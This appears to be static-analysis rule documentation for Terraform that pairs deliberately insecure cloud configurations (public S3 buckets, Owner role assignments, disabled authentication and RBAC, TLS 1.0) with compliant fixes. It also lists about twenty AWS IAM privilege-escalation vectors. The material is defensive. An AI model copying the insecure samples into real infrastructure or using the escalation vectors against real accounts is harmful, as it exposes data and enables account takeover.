  principal_id         = data.azuread_user.user.object_id
}

Compliant Solution

resource "azurerm_role_assignment" "example" {
  scope                = azurerm_resource_group.example.id
  role_definition_name = "Reader"
  principal_id         = data.azuread_user.user.object_id
}

See

terraform:S6265

Predefined permissions, also known as canned ACLs, are an easy way to grant broad privileges to predefined groups or users.

The following canned ACLs are security-sensitive:

  • PublicRead and PublicReadWrite grant, respectively, "read" and "read and write" privileges to everyone in the world (the AllUsers group).
  • AuthenticatedRead grants "read" privilege to all authenticated users (AuthenticatedUsers group).

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, css …​).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege policy, i.e. to grant users only the permissions necessary for their required tasks. In the context of canned ACLs, set the ACL to private (the default) and, if more granularity is needed, use an appropriate S3 policy.

Sensitive Code Example

All users (i.e. anyone in the world, authenticated or not) have read and write permissions with the public-read-write access control:

resource "aws_s3_bucket" "mynoncompliantbucket" { # Sensitive
  bucket = "mynoncompliantbucketname"
  acl    = "public-read-write"
}

Compliant Solution

With the private access control (the default), only the bucket owner has read/write permissions on the bucket and its ACL.

resource "aws_s3_bucket" "mycompliantbucket" { # Compliant
  bucket = "mycompliantbucketname"
  acl    = "private"
}
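Where more granularity than the private canned ACL is needed, an explicit bucket policy can grant scoped permissions. A minimal sketch, assuming a hypothetical reader role ARN:

```hcl
# Grants read-only access to a single role instead of a broad canned ACL.
resource "aws_s3_bucket_policy" "mycompliantbucketpolicy" {
  bucket = aws_s3_bucket.mycompliantbucket.id

  policy = jsonencode({
    Version = "2012-10-17"
    Statement = [
      {
        Effect    = "Allow"
        Principal = { AWS = "arn:aws:iam::123456789012:role/reporting" } # hypothetical role
        Action    = ["s3:GetObject"]
        Resource  = ["${aws_s3_bucket.mycompliantbucket.arn}/*"]
      }
    ]
  })
}
```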

See

terraform:S6381

Azure Resource Manager offers built-in roles that can be assigned to users, groups, or service principals. Some of these roles should be carefully assigned as they grant sensitive permissions like the ability to reset passwords for all users.

An Azure account that fails to limit the use of such roles has a higher risk of being breached by a compromised owner.

This rule raises an issue when one of the following roles is assigned:

  • Contributor (b24988ac-6180-42a0-ab88-20f7382dd24c)
  • Owner (8e3af657-a8ff-443c-a75c-2fe8c4bcb635)
  • User Access Administrator (18d7d88d-d35e-4fb5-a5c3-7773c20a72d9)

Ask Yourself Whether

  • The user, group, or service principal doesn’t use the entirety of this extensive set of permissions to operate on a day-to-day basis.
  • It is possible to follow the Separation of Duties principle and split permissions between multiple users, but it’s not enforced.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

  • Limit the assignment of Owner roles to less than 3 people or service principals.
  • Apply the least privilege principle by choosing a role with a limited set of permissions.
  • If no built-in role meets your needs, create a custom role with as few permissions as possible.
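The last recommendation can be sketched with a custom role definition; the role name and permission set below are illustrative assumptions:

```hcl
# A custom role granting only the read permissions actually needed.
resource "azurerm_role_definition" "maps_reader" {
  name  = "example-maps-reader" # hypothetical role name
  scope = azurerm_resource_group.example.id

  permissions {
    actions     = ["Microsoft.Maps/accounts/read"] # illustrative permission
    not_actions = []
  }

  assignable_scopes = [
    azurerm_resource_group.example.id
  ]
}
```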

Sensitive Code Example

resource "azurerm_role_assignment" "example" {
  scope                = azurerm_resource_group.example.id
  role_definition_name = "Owner" # Sensitive
  principal_id         = data.azuread_user.example.id
}

Compliant Solution

resource "azurerm_role_assignment" "example" {
  scope                = azurerm_resource_group.example.id
  role_definition_name = "Azure Maps Data Reader"
  principal_id         = data.azuread_user.example.id
}

See

terraform:S6380

Allowing anonymous access can reduce an organization’s ability to protect itself against attacks on its Azure resources.

Security incidents may include disrupting critical functions, data theft, and additional Azure subscription costs due to resource overload.

Using authentication coupled with fine-grained authorizations helps bring defense in depth and gives traceability to investigators of security incidents.

Depending on the affected Azure resource, multiple authentication choices are possible: Active Directory Authentication, OpenID implementations (Google, Microsoft, etc.) or native Azure mechanisms.

Ask Yourself Whether

  • This Azure resource is essential for the information system infrastructure.
  • This Azure resource is essential for mission-critical functions.
  • This Azure resource stores or processes sensitive data.
  • Compliance policies require access to this resource to be authenticated.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Enable authentication in this Azure resource, and disable anonymous access.

If only Basic Authentication is available, enable it.

Sensitive Code Example

For App Services and equivalent:

resource "azurerm_function_app" "example" {
  name = "example"

  auth_settings {
    enabled = false # Sensitive
  }

  auth_settings {
    enabled = true
    unauthenticated_client_action = "AllowAnonymous" # Sensitive
  }
}

For API Management:

resource "azurerm_api_management_api" "example" { # Sensitive, the openid_authentication block is missing
  name = "example-api"
}

resource "azurerm_api_management" "example" {
  sign_in {
    enabled = false # Sensitive
  }
}

For Data Factory Linked Services:

resource "azurerm_data_factory_linked_service_sftp" "example" {
  authentication_type = "Anonymous" # Sensitive
}

For Storage Accounts:

resource "azurerm_storage_account" "example" {
  allow_blob_public_access = true # Sensitive
}

resource "azurerm_storage_container" "example" {
  container_access_type = "blob" # Sensitive
}

For Redis Caches:

resource "azurerm_redis_cache" "example" {
  name = "example-cache"

  redis_configuration {
    enable_authentication = false # Sensitive
  }
}

Compliant Solution

For App Services and equivalent:

resource "azurerm_function_app" "example" {
  name = "example"

  auth_settings {
    enabled = true
    unauthenticated_client_action = "RedirectToLoginPage"
  }
}

For API Management:

resource "azurerm_api_management_api" "example" {
  name = "example-api"

  openid_authentication {
    openid_provider_name = azurerm_api_management_openid_connect_provider.example.name
  }
}

resource "azurerm_api_management" "example" {
  sign_in {
    enabled = true
  }
}

For Data Factory Linked Services:

resource "azurerm_data_factory_linked_service_sftp" "example" {
  authentication_type = "Basic"
  username            = local.creds.username
  password            = local.creds.password
}

resource "azurerm_data_factory_linked_service_odata" "example" {
  basic_authentication {
    username = local.creds.username
    password = local.creds.password
  }
}

For Storage Accounts:

resource "azurerm_storage_account" "example" {
  allow_blob_public_access = false
}

resource "azurerm_storage_container" "example" {
  container_access_type = "private"
}

For Redis Caches:

resource "azurerm_redis_cache" "example" {
  name = "example-cache"

  redis_configuration {
    enable_authentication = true
  }
}

See

terraform:S6383

Disabling Role-Based Access Control (RBAC) on Azure resources can reduce an organization’s ability to protect itself against access controls being compromised.

To be considered safe, access controls must follow the principle of least privilege and correctly segregate duties among users. RBAC helps enforce these practices by adapting the organization’s access control needs into explicit role-based policies: it helps keep access controls maintainable and sustainable.

Furthermore, RBAC allows operations teams to work faster during a security incident. It helps mitigate account theft or intrusions by quickly shutting down access.

Ask Yourself Whether

  • This Azure resource is essential for the information system infrastructure.
  • This Azure resource is essential for mission-critical functions.
  • Compliance policies require access to this resource to be enforced through the use of Role-Based Access Control.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Enable Azure RBAC when the Azure resource supports it.
  • For Kubernetes clusters, enable Azure RBAC if Azure AD integration is supported. Otherwise, use the built-in Kubernetes RBAC.

Sensitive Code Example

For Azure Kubernetes Services:

resource "azurerm_kubernetes_cluster" "example" {
  role_based_access_control {
    enabled = false # Sensitive
  }
}

resource "azurerm_kubernetes_cluster" "example2" {
  role_based_access_control {
    enabled = true

    azure_active_directory {
      managed = true
      azure_rbac_enabled = false # Sensitive
    }
  }
}

For Key Vaults:

resource "azurerm_key_vault" "example" {
  enable_rbac_authorization = false # Sensitive
}

Compliant Solution

For Azure Kubernetes Services:

resource "azurerm_kubernetes_cluster" "example" {
  role_based_access_control {
    enabled = true
  }
}

resource "azurerm_kubernetes_cluster" "example2" {
  role_based_access_control {
    enabled = true

    azure_active_directory {
      managed = true
      azure_rbac_enabled = true
    }
  }
}

For Key Vaults:

resource "azurerm_key_vault" "example" {
  enable_rbac_authorization   = true
}

See

terraform:S6382

Disabling certificate-based authentication can reduce an organization’s ability to react against attacks on its critical functions and data.

Azure offers various authentication options to access resources: Anonymous connections, Basic authentication, password-based authentication, and certificate-based authentication.

Choosing certificate-based authentication helps establish client/host trust by allowing the host to verify the client and vice versa. A certificate cannot be forged or replayed by a man-in-the-middle eavesdropper, and its private key is never sent over the network, so it is harder to steal than a password.

In case of a security incident, certificates give investigators traceability and allow security operations teams to react faster. For example, all compromised certificates can be revoked individually, or an issuing certificate can be revoked, which causes all the certificates it issued to become untrusted.

Ask Yourself Whether

  • This Azure resource is essential for the information system infrastructure.
  • This Azure resource is essential for mission-critical functions.
  • Compliance policies require access to this resource to be authenticated with certificates.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Enable certificate-based authentication.

Sensitive Code Example

For App Service:

resource "azurerm_app_service" "example" {
  client_cert_enabled = false # Sensitive
}

For Logic App Standards and Function Apps:

resource "azurerm_function_app" "example" {
  client_cert_mode = "Optional" # Sensitive
}

For Data Factory Linked Services:

resource "azurerm_data_factory_linked_service_web" "example" {
  authentication_type = "Basic" # Sensitive
}

For API Management:

resource "azurerm_api_management" "example" {
  sku_name = "Consumption_1"
  client_certificate_mode = "Optional" # Sensitive
}

For Linux and Windows Web Apps:

resource "azurerm_linux_web_app" "example" {
  client_cert_enabled = false # Sensitive
}
resource "azurerm_linux_web_app" "example2" {
  client_cert_enabled = true
  client_cert_mode = "Optional" # Sensitive
}

Compliant Solution

For App Service:

resource "azurerm_app_service" "example" {
  client_cert_enabled = true
}

For Logic App Standards and Function Apps:

resource "azurerm_function_app" "example" {
  client_cert_mode = "Required"
}

For Data Factory Linked Services:

resource "azurerm_data_factory_linked_service_web" "example" {
  authentication_type = "ClientCertificate"
}

For API Management:

resource "azurerm_api_management" "example" {
  sku_name = "Consumption_1"
  client_certificate_mode = "Required"
}

For Linux and Windows Web Apps:

resource "azurerm_linux_web_app" "example" {
  client_cert_enabled = true
  client_cert_mode = "Required"
}

See

terraform:S6317

Why is this an issue?

AWS Identity and Access Management (IAM) is the service that defines access to AWS resources. One of the core components of IAM is the policy which, when attached to an identity or a resource, defines its permissions. Policies granting permissions to an Identity (a User, a Group, or a Role) are called identity-based policies. They grant an identity the ability to perform a predefined set of actions on a list of resources.

Here is an example of a policy document defining a limited set of permissions that grants users the ability to manage their own access keys.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Action": [
                "iam:CreateAccessKey",
                "iam:DeleteAccessKey",
                "iam:ListAccessKeys",
                "iam:UpdateAccessKey"
            ],
            "Resource": "arn:aws:iam::245500951992:user/${aws:username}",
            "Effect": "Allow",
            "Sid": "AllowManageOwnAccessKeys"
        }
    ]
}
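In Terraform, a document like the one above can be attached with an aws_iam_policy resource. The sketch below is hypothetical (resource and policy names are illustrative); note that the ${aws:username} IAM policy variable must be escaped as $${aws:username} so Terraform does not try to interpolate it:

```terraform
resource "aws_iam_policy" "manage_own_access_keys" {
  name = "manage-own-access-keys"
  policy = jsonencode({
    Version = "2012-10-17"
    Statement = [{
      Sid    = "AllowManageOwnAccessKeys"
      Effect = "Allow"
      Action = [
        "iam:CreateAccessKey",
        "iam:DeleteAccessKey",
        "iam:ListAccessKeys",
        "iam:UpdateAccessKey"
      ]
      # "$${...}" escapes Terraform interpolation; AWS receives "${aws:username}"
      Resource = "arn:aws:iam::245500951992:user/$${aws:username}"
    }]
  })
}
```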

Privilege escalation generally happens when an identity policy gives an identity the ability to grant more privileges than the ones it already has. Here is another example of a policy document that hides a privilege escalation. It allows an identity to generate a new access key for any user from the account, including users with high privileges.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Action": [
                "iam:CreateAccessKey",
                "iam:DeleteAccessKey",
                "iam:ListAccessKeys",
                "iam:UpdateAccessKey"
            ],
            "Resource": "*",
            "Effect": "Allow",
            "Sid": "AllowManageOwnAccessKeys"
        }
    ]
}

Although it looks like it grants a limited set of permissions, this policy would, in practice, give the highest privileges to the identity it’s attached to.

Privilege escalation is a serious issue as it allows a malicious user to easily escalate to a high privilege identity from a low privilege identity it took control of.

The example above is just one of many permission escalation vectors. Here is the list of vectors that the rule can detect:

  • Create Policy Version: Create a new IAM policy version and set it as default
  • Set Default Policy Version: Set a different IAM policy version as default
  • Create AccessKey: Create a new access key for any user
  • Create Login Profile: Create a login profile with a password chosen by the attacker
  • Update Login Profile: Update the existing password with one chosen by the attacker
  • Attach User Policy: Attach a permissive IAM policy like "AdministratorAccess" to a user the attacker controls
  • Attach Group Policy: Attach a permissive IAM policy like "AdministratorAccess" to a group containing a user the attacker controls
  • Attach Role Policy: Attach a permissive IAM policy like "AdministratorAccess" to a role that can be assumed by the user the attacker controls
  • Put User Policy: Alter the existing inline IAM policy of a user the attacker controls
  • Put Group Policy: Alter the existing inline IAM policy of a group containing a user the attacker controls
  • Put Role Policy: Alter an existing inline IAM role policy; the role can then be assumed by the user the attacker controls
  • Add User to Group: Add a user the attacker controls to a group that has a larger range of permissions
  • Update Assume Role Policy: Update a role's "AssumeRolePolicyDocument" to allow a user the attacker controls to assume it
  • EC2: Create an EC2 instance that will execute with high privileges
  • Lambda Create and Invoke: Create a Lambda function that will execute with high privileges and invoke it
  • Lambda Create and Add Permission: Create a Lambda function that will execute with high privileges and grant permission to invoke it to a user or a service
  • Lambda triggered with an external event: Create a Lambda function that will execute with high privileges and link it to an external event
  • Update Lambda code: Update the code of a Lambda function executing with high privileges
  • CloudFormation: Create a CloudFormation stack that will execute with high privileges
  • Data Pipeline: Create a Pipeline that will execute with high privileges
  • Glue Development Endpoint: Create a Glue Development Endpoint that will execute with high privileges
  • Update Glue Dev Endpoint: Update the associated SSH key for the Glue endpoint
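As an illustration, the "Attach User Policy" vector corresponds to an identity-based policy like the following hypothetical sketch: with iam:AttachUserPolicy allowed on all resources, an attacker can attach a permissive managed policy such as "AdministratorAccess" to a user they control.

```terraform
resource "aws_iam_policy" "attach_user_policy_vector" {
  name = "attach-user-policy-vector"
  policy = jsonencode({
    Version = "2012-10-17"
    Statement = [{
      Effect   = "Allow"
      Action   = ["iam:AttachUserPolicy"]
      Resource = "*" # any user, including one the attacker controls
    }]
  })
}
```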

The general recommendation to protect against privilege escalation is to restrict the resources to which sensitive permissions are granted. The first example above is a good demonstration of sensitive permissions being used with a narrow scope of resources and where no privilege escalation is possible.

Noncompliant code example

This policy allows updating the code of any Lambda function. Updating the code of a Lambda function that executes with high privileges leads to privilege escalation.

resource "aws_iam_policy" "example" {
  name = "example"
  policy = <<EOF
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "lambda:UpdateFunctionCode"
            ],
            "Resource": "*"
        }
    ]
}
EOF
}

Compliant solution

Narrow the policy to allow updating the code of only specific Lambda functions.

resource "aws_iam_policy" "example" {
  name = "example"
  policy = <<EOF
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "lambda:UpdateFunctionCode"
            ],
            "Resource": "arn:aws:lambda:us-east-2:123456789012:function:my-function:1"
        }
    ]
}
EOF
}

Resources

terraform:S6319

Amazon SageMaker is a managed machine learning service in a hosted, production-ready environment. To train machine learning models, SageMaker instances can process potentially sensitive data, such as personal information that should not be stored unencrypted. Encryption ensures that adversaries who gain physical access to the storage media cannot read the data.

Ask Yourself Whether

  • The instance contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SageMaker notebook instances that contain sensitive information. Encryption and decryption are handled transparently by SageMaker, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_sagemaker_notebook_instance:

resource "aws_sagemaker_notebook_instance" "notebook" {  # Sensitive, encryption disabled by default
}

Compliant Solution

For aws_sagemaker_notebook_instance:

resource "aws_sagemaker_notebook_instance" "notebook" {
  kms_key_id = aws_kms_key.enc_key.key_id
}

See

terraform:S6275

Amazon Elastic Block Store (EBS) is a block-storage service for Amazon Elastic Compute Cloud (EC2). EBS volumes can be encrypted, ensuring the security of both data at rest and data in transit between an instance and its attached EBS storage. If adversaries gain physical access to the storage medium, they cannot access the data. Encryption can be enabled for specific volumes or for all new volumes and snapshots. Volumes created from snapshots inherit their encryption configuration: a volume created from an encrypted snapshot will also be encrypted by default.

Ask Yourself Whether

  • The disk contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EBS volumes that contain sensitive information. Encryption and decryption are handled transparently by EC2, so no further modifications to the application are necessary. Instead of enabling encryption for every volume, it is also possible to enable encryption globally for a specific region. While creating volumes from encrypted snapshots will result in them being encrypted, explicitly enabling this security parameter will prevent any future unexpected security downgrade.

Sensitive Code Example

For aws_ebs_volume:

resource "aws_ebs_volume" "ebs_volume" {  # Sensitive as encryption is disabled by default
}
resource "aws_ebs_volume" "ebs_volume" {
  encrypted = false  # Sensitive
}

For aws_ebs_encryption_by_default:

resource "aws_ebs_encryption_by_default" "default_encryption" {
  enabled = false  # Sensitive
}

For aws_launch_configuration:

resource "aws_launch_configuration" "launch_configuration" {
  root_block_device {  # Sensitive as encryption is disabled by default
  }
  ebs_block_device {  # Sensitive as encryption is disabled by default
  }
}
resource "aws_launch_configuration" "launch_configuration" {
  root_block_device {
    encrypted = false  # Sensitive
  }
  ebs_block_device {
    encrypted = false  # Sensitive
  }
}

Compliant Solution

For aws_ebs_volume:

resource "aws_ebs_volume" "ebs_volume" {
  encrypted = true
}

For aws_ebs_encryption_by_default:

resource "aws_ebs_encryption_by_default" "default_encryption" {
  enabled = true  # Optional, default is "true"
}

For aws_launch_configuration:

resource "aws_launch_configuration" "launch_configuration" {
  root_block_device {
    encrypted = true
  }
  ebs_block_device {
    encrypted = true
  }
}

See

terraform:S6270

Resource-based policies granting access to all users can lead to information leakage.

Ask Yourself Whether

  • The AWS resource stores or processes sensitive data.
  • The AWS resource is designed to be private.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege principle, i.e. to grant users only the permissions necessary for their required tasks. In the context of resource-based policies, list the principals that need access and grant them only the required privileges.

Sensitive Code Example

This policy allows all users, including anonymous ones, to access an S3 bucket:

resource "aws_s3_bucket_policy" "mynoncompliantpolicy" {  # Sensitive
  bucket = aws_s3_bucket.mybucket.id
  policy = jsonencode({
    Id = "mynoncompliantpolicy"
    Version = "2012-10-17"
    Statement = [{
            Effect = "Allow"
            Principal = {
                AWS = "*"
            }
            Action = [
                "s3:PutObject"
            ]
            Resource: "${aws_s3_bucket.mybucket.arn}/*"
        }
    ]
  })
}

Compliant Solution

This policy allows only the authorized users:

resource "aws_s3_bucket_policy" "mycompliantpolicy" {
  bucket = aws_s3_bucket.mybucket.id
  policy = jsonencode({
    Id = "mycompliantpolicy"
    Version = "2012-10-17"
    Statement = [{
            Effect = "Allow"
            Principal = {
                AWS = [
                    "arn:aws:iam::${data.aws_caller_identity.current.account_id}:root"
                ]
            }
            Action = [
                "s3:PutObject"
            ]
            Resource = "${aws_s3_bucket.mybucket.arn}/*"
        }
    ]
  })
}

See

terraform:S6404

Granting public access to GCP resources may reduce an organization’s ability to protect itself against attacks or theft of its GCP resources.
Security incidents associated with misuse of public access include disruption of critical functions, data theft, and additional costs due to resource overload.

To be as prepared as possible in the event of a security incident, authentication combined with fine-grained permissions helps maintain the principle of defense in depth and trace incidents back to the perpetrators.

GCP also provides the ability to grant access to a large group of people:

  • If public access is granted to all Google users, the impact of a data theft is the same as if public access is granted to all Internet users.
  • If access is granted to a large Google group, the impact of a data theft is limited based on the size of the group.

The only thing that changes in these cases is the ability to track user access in the event of an incident.

Ask Yourself Whether

  • This GCP resource is essential to the information system infrastructure.
  • This GCP resource is essential to mission-critical functions.
  • This GCP resource stores or processes sensitive data.
  • Compliance policies require that access to this resource be authenticated.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Explicitly set access to this resource or function as private.

Sensitive Code Example

For IAM resources:

resource "google_cloudfunctions_function_iam_binding" "example" {
  members = [
    "allUsers",              # Sensitive
    "allAuthenticatedUsers", # Sensitive
  ]
}

resource "google_cloudfunctions_function_iam_member" "example" {
  member = "allAuthenticatedUsers" # Sensitive
}

For ACL resources:

resource "google_storage_bucket_access_control" "example" {
  entity = "allUsers" # Sensitive
}

resource "google_storage_bucket_acl" "example" {
  role_entity = [
    "READER:allUsers",              # Sensitive
    "READER:allAuthenticatedUsers", # Sensitive
  ]
}

For container clusters:

resource "google_container_cluster" "example" {
  private_cluster_config {
    enable_private_nodes    = false # Sensitive
    enable_private_endpoint = false # Sensitive
  }
}

Compliant Solution

For IAM resources:

resource "google_cloudfunctions_function_iam_binding" "example" {
  members = [
    "serviceAccount:${google_service_account.example.email}",
    "group:${var.example_group}"
  ]
}

resource "google_cloudfunctions_function_iam_member" "example" {
  member = "user:${var.example_user}"
}

For ACL resources:

resource "google_storage_bucket_access_control" "example" {
  entity = "user-${var.example_user}"
}

resource "google_storage_bucket_acl" "example" {
  role_entity = [
    "READER:user-name@example.com",
    "READER:group-admins@example.com"
  ]
}

For container clusters:

resource "google_container_cluster" "example" {
  private_cluster_config {
    enable_private_nodes    = true
    enable_private_endpoint = true
  }
}

See

terraform:S6327

Amazon Simple Notification Service (SNS) is a managed messaging service for application-to-application (A2A) and application-to-person (A2P) communication. SNS topics allow publisher systems to fan out messages to a large number of subscriber systems. Amazon SNS can encrypt messages as soon as they are received. If adversaries gain physical access to the storage medium or otherwise leak a message, they cannot access the data.

Ask Yourself Whether

  • The topic contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SNS topics that contain sensitive information. Encryption and decryption are handled transparently by SNS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_sns_topic:

resource "aws_sns_topic" "topic" {  # Sensitive, encryption disabled by default
  name = "sns-unencrypted"
}

Compliant Solution

For aws_sns_topic:

resource "aws_sns_topic" "topic" {
  name = "sns-encrypted"
  kms_master_key_id = aws_kms_key.enc_key.key_id
}

See

terraform:S6403

By default, GCP SQL instances offer encryption in transit, with support for TLS, but insecure connections are still accepted. On an unsecured network, such as a public network, the risk of traffic being intercepted is high. When the data isn’t encrypted, an attacker can intercept it and read confidential information.

When creating a GCP SQL instance, a public IP address is automatically assigned to it and connections to the SQL instance from public networks can be authorized.

TLS is automatically used when connecting to SQL instances through mechanisms such as the SQL Auth proxy.

Ask Yourself Whether

Connections are not already automatically encrypted by GCP (e.g. by the SQL Auth proxy), and:

  • Connections to the SQL instance are performed on untrusted networks.
  • The data stored in the SQL instance is confidential.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt all connections to the SQL instance, whether using public or private IP addresses. However, since private networks can be considered trusted, requiring TLS in this situation is usually a lower priority task.

Sensitive Code Example

resource "google_sql_database_instance" "example" { # Sensitive: tls is not required
  name             = "noncompliant-master-instance"
  database_version = "POSTGRES_11"
  region           = "us-central1"

  settings {
    tier = "db-f1-micro"
  }
}

Compliant Solution

resource "google_sql_database_instance" "example" {
  name             = "compliant-master-instance"
  database_version = "POSTGRES_11"
  region           = "us-central1"

  settings {
    tier = "db-f1-micro"
    ip_configuration {
      require_ssl = true
      ipv4_enabled = true
    }
  }
}

See

terraform:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in AWS API Gateway

Code examples

These code samples illustrate how to fix this issue in both APIGateway and ApiGatewayV2.

Noncompliant code example

resource "aws_api_gateway_domain_name" "example" {
  domain_name = "api.example.com"
  security_policy = "TLS_1_0" # Noncompliant
}

ApiGatewayV2 uses a weak TLS security policy by default:

resource "aws_apigatewayv2_domain_name" "example" {
  domain_name = "api.example.com"
  domain_name_configuration {} # Noncompliant
}

Compliant solution

resource "aws_api_gateway_domain_name" "example" {
  domain_name = "api.example.com"
  security_policy = "TLS_1_2"
}
resource "aws_apigatewayv2_domain_name" "example" {
  domain_name = "api.example.com"
  domain_name_configuration {
    security_policy = "TLS_1_2"
  }
}

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS v1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback arises when the framework used is outdated: its TLS v1.2 settings may enable older cipher suites that are now deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

terraform:S6249

By default, S3 buckets can be accessed through both the HTTP and HTTPS protocols.

As HTTP is a clear-text protocol, it lacks encryption of the transported data and cannot establish an authenticated connection. This means that a malicious actor able to intercept traffic on the network can read, modify, or corrupt the transported content.

Ask Yourself Whether

  • The S3 bucket stores sensitive information.
  • The infrastructure has to comply with AWS Foundational Security Best Practices standard.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to deny all HTTP requests:

  • for all objects (*) of the bucket
  • for all principals (*)
  • for all actions (*)

Sensitive Code Example

No secure policy is attached to this bucket:

resource "aws_s3_bucket" "mynoncompliantbucket" { # Sensitive
  bucket = "mynoncompliantbucketname"
}

A policy is defined but forces HTTPS communication for only some users:

resource "aws_s3_bucket" "mynoncompliantbucket" { # Sensitive
  bucket = "mynoncompliantbucketname"
}

resource "aws_s3_bucket_policy" "mynoncompliantbucketpolicy" {
  bucket = "mynoncompliantbucketname"

  policy = jsonencode({
    Version = "2012-10-17"
    Id      = "mynoncompliantbucketpolicy"
    Statement = [
      {
        Sid       = "HTTPSOnly"
        Effect    = "Deny"
        Principal = [
          "arn:aws:iam::123456789123:root"
        ] # secondary location: only one principal is forced to use https
        Action    = "s3:*"
        Resource = [
          aws_s3_bucket.mynoncompliantbucket.arn,
          "${aws_s3_bucket.mynoncompliantbucket.arn}/*",
        ]
        Condition = {
          Bool = {
            "aws:SecureTransport" = "false"
          }
        }
      },
    ]
  })
}

Compliant Solution

A secure policy that denies all HTTP requests is used:

resource "aws_s3_bucket" "mycompliantbucket" {
  bucket = "mycompliantbucketname"
}

resource "aws_s3_bucket_policy" "mycompliantpolicy" {
  bucket = "mycompliantbucketname"

  policy = jsonencode({
    Version = "2012-10-17"
    Id      = "mycompliantpolicy"
    Statement = [
      {
        Sid       = "HTTPSOnly"
        Effect    = "Deny"
        Principal = "*"
        Action    = "s3:*"
        Resource = [
          aws_s3_bucket.mycompliantbucket.arn,
          "${aws_s3_bucket.mycompliantbucket.arn}/*",
        ]
        Condition = {
          Bool = {
            "aws:SecureTransport" = "false"
          }
        }
      },
    ]
  })
}

See

terraform:S6406

Excessive granting of GCP IAM permissions can allow attackers to exploit an organization’s cloud resources with malicious intent.

To prevent improper creation or deletion of resources after an account is compromised, proactive measures include both following GCP Security Insights and ensuring custom roles contain as few privileges as possible.

After gaining a foothold in the target infrastructure, sophisticated attacks typically consist of two major parts.
First, attackers must deploy new resources to carry out their malicious intent. To guard against this, operations teams must control what unexpectedly appears in the infrastructure, such as what is:

  • added
  • written down
  • updated
  • started
  • appended
  • applied
  • accessed.

Once the malicious intent is executed, attackers must avoid detection at all costs.
To counter attackers' attempts to remove their fingerprints, operations teams must control what unexpectedly disappears from the infrastructure, such as what is:

  • stopped
  • disabled
  • canceled
  • deleted
  • destroyed
  • detached
  • disconnected
  • suspended
  • rejected
  • removed.

For operations teams to be resilient in this scenario, their organization must apply both:

  • Detection security: log these actions to better detect malicious actions.
  • Preventive security: review and limit granted permissions.

This rule raises an issue when a custom role grants a number of sensitive permissions (read-write or destructive permissions) that is greater than a given parameter.
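The detection heuristic described above can be sketched in a few lines of Python. The verb list and threshold below are illustrative assumptions, not the rule's actual implementation:

```python
# Sketch: flag a custom role when the number of "sensitive" permissions
# (read-write or destructive verbs) exceeds a configurable threshold.
SENSITIVE_VERBS = {"create", "delete", "update", "setiampolicy", "destroy"}

def count_sensitive(permissions):
    """Count permissions whose final segment is a read-write/destructive verb."""
    return sum(
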